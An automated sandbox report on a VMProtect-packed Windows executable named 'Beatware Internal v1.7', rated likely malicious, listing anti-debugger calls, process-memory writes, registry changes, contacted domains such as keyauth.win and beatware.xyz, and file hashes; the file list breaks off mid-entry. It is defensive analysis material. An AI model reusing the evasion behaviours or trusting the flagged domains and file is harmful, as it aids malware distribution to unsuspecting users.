Malware Analysis Report

2025-03-15 06:03

Sample ID 240510-28kmfsab36
Target Beatware_Internal_v1.7.rar
SHA256 ba58224021afc0386451f5f548183b70654c941873a924c55d8f804965c3a373
Tags
vmprotect persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

ba58224021afc0386451f5f548183b70654c941873a924c55d8f804965c3a373

Threat Level: Likely malicious

The file Beatware_Internal_v1.7.rar was found to be: Likely malicious.

Malicious Activity Summary

vmprotect persistence

Downloads MZ/PE file

Sets service image path in registry

VMProtect packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 23:15

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 23:15

Reported

2024-05-10 23:17

Platform

win7-20240215-en

Max time kernel

150s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2C5A7B31-0F23-11EF-80DF-F60046394256} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009b106788dea7af4d98683a8983feb7c6000000000200000000001066000000010000200000003a793cea2cffcaac90a48eb1dfd98588b6737d7f07fee036fe5bdebb9418e21d000000000e80000000020000200000002037994b312bd8446285552e932fc1c91da368204923311edfbe0bccb44e5be290000000444332a8b96d376c0e08e6d8c773e82285e7d04723f21651b524fbf7ee4417310c2ce5cc835e271010aa17c5d1f31771fd7586ba9a8e65c2951d5725378fa918db2b9693b655113e0e26098ab9bb99871371e6bf5cdb7c7eec8d67bcd0098ab8f927d22c939dcb3489de8f6f2bc6a247052adbc860b23876f0e8cc98b986b217333659bacfa52a54788f2b29212b5cb74000000036dff0f5ff1d2348d7e00a6f5c95e751f4d89e9b035de6b3367b652fb5429df8ee8ad7d43f57c9da6828f6e288a8bfc4180a276e4114fa2a2c707d1978ef0ec9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "421544789" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c01408f12fa3da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009b106788dea7af4d98683a8983feb7c600000000020000000000106600000001000020000000081861b93f957b506854386d8c3eba72e51a469e8dc3aff25ea1201492324195000000000e80000000020000200000008176574f10738f37fc3fa076466cf902c8215391c83eb25ef3967ace005e9d7e20000000e16549890d15e286ac11654fc5bf0637eb287afaee751029cc43e03e319891e640000000f1daf1b7011fd6039310bdd6ddf9ed3a994510a94f1466bca5ee216ef4f30b90d80b2d74774bbea20ae003166bb063543eaa2284068a4d778394673cfddfd7a4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2912 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2468 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2468 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2468 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2468 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2468 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2468 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2468 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2468 wrote to memory of 2512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2912 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2912 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2912 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2488 wrote to memory of 2544 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2488 wrote to memory of 2544 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2488 wrote to memory of 2544 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2488 wrote to memory of 2544 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2912 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://beatware.xyz/discord

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 beatware.xyz udp
US 104.21.71.116:443 beatware.xyz tcp
US 104.21.71.116:443 beatware.xyz tcp
N/A 127.0.0.1:49201 tcp
N/A 127.0.0.1:49203 tcp
US 8.8.8.8:53 dsc.gg udp
US 172.67.156.126:443 dsc.gg tcp
US 172.67.156.126:443 dsc.gg tcp
US 8.8.8.8:53 r.dsc.gg udp
US 104.21.7.223:443 r.dsc.gg tcp
US 104.21.7.223:443 r.dsc.gg tcp
US 8.8.8.8:53 discord.gg udp
US 162.159.134.234:443 discord.gg tcp
US 162.159.134.234:443 discord.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2912-7-0x000000013F4B5000-0x000000013F81E000-memory.dmp

memory/2912-4-0x0000000077CC0000-0x0000000077CC2000-memory.dmp

memory/2912-2-0x0000000077CC0000-0x0000000077CC2000-memory.dmp

memory/2912-0-0x0000000077CC0000-0x0000000077CC2000-memory.dmp

memory/2912-5-0x000000013F420000-0x000000013FD9B000-memory.dmp

memory/2912-10-0x000000013F420000-0x000000013FD9B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\favicon[1].htm

MD5 011e81dfa695f67680f7b8190e9ab008
SHA1 95971340b232699ae3bfa505cf5763b6afcff253
SHA256 0c6ee91de583298df3e6ab98aef857ba19c669e9adb5c80427c97971afcc37ee
SHA512 a14b35299001aad2d4eab68ad0bc78b31a72081781d0f29d961e7d98e637dc5f90c0ae472ec5b107cb64ba0092a0fe334ae0099401d671f55016e4963757e59b

C:\Users\Admin\AppData\Local\Temp\Cab2DA7.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar2DAA.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2cd45615bccec842ee6c8eb57afe1e3
SHA1 071593c49dea9aab2873d0e2ba634d2d7cef7096
SHA256 4086a9ba25b6209dd9459a16726473f590d8bbd25e37b98ac29fac38c3fd4b44
SHA512 fb7b55df09315d4896a1f150b77e80739c28a3e81c3dcd554216e3650a5e64cf1a46154a5498461b36f59543c7bbdaf51b4a96c6badf09dbf2596ab49fd2bbbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 311f6fc3e1df622efd9fbc9e53e9289e
SHA1 af5d3da69a506fbab8a973185f36b9e652694bb7
SHA256 9e8f4b5e96511bdfcf526d86219db55ad596de97975846e49177fb7085e6c9b3
SHA512 0a24f8ab3437fc19e6e050178f222af6ab3b2a802522bc15a8eafd574da5c0bbb58b597a2dee2ca4da133fb51a4dda3da9793809813f6f295dbd2e47e0f9c4ed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 86709c51fd6678aba5024b566d3f1558
SHA1 c1f81ee31a56ed2ae87e74b12b936ca6d5288be6
SHA256 d2444a1b93da88b68dc9d4045bf87ac3b6844d024dd9cd8b0aade36abbee9f11
SHA512 96fe36c75cefb5d76ef973d455ada4d959934a400830daeac3f8b9a5a2b4cff8977f040d09a2f3e2c1f8da7ba7e1f925de761652974a6fb9de6cfb01943e69ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\673IEUYT\favicon[1].ico

MD5 ec2c34cadd4b5f4594415127380a85e6
SHA1 e7e129270da0153510ef04a148d08702b980b679
SHA256 128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7
SHA512 c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\92bocja\imagestore.dat

MD5 3fd9b65e0d42f3a3e69fb789eae89b6f
SHA1 77987ec3139220b7470052f069d568e5d0899498
SHA256 3321ec9a2dc6dae2a76f1994bffa7238d3f3774dead3f58fefcb9cd0256fc6b5
SHA512 0f93a1e03915dd7d5e3cd0f4878e6b2ece4699289c46c05775583c604fc79b3fc4c596e5e370ee559e71e61672fde5145f5bcc165e7766f7beabcd9f2e6340e6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d510014deba3eeebfc25701ccf440633
SHA1 dfcb103c9cf43e72a7e354ac60d1c50a2519a7bc
SHA256 32287929b2edd339fe19c044b6c5e5d170f126f2b665e196ffdc9b58bc0facb0
SHA512 581eb151c49e872e591bc9c20f7044606deaaffb5e1d97db65493829612288f2b0a3b09f6cbf75a625b221c0cb0dc1fe2facb64f87504b745b591f89c3e72090

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ae6fb448151fb79249d1c5e60942e0f1
SHA1 23fa8e196eb60abba38563632a77b0f3c0289553
SHA256 2339608aa55311595768be43f7fed4b3c244fd06860049d4e5ad25700395b3f1
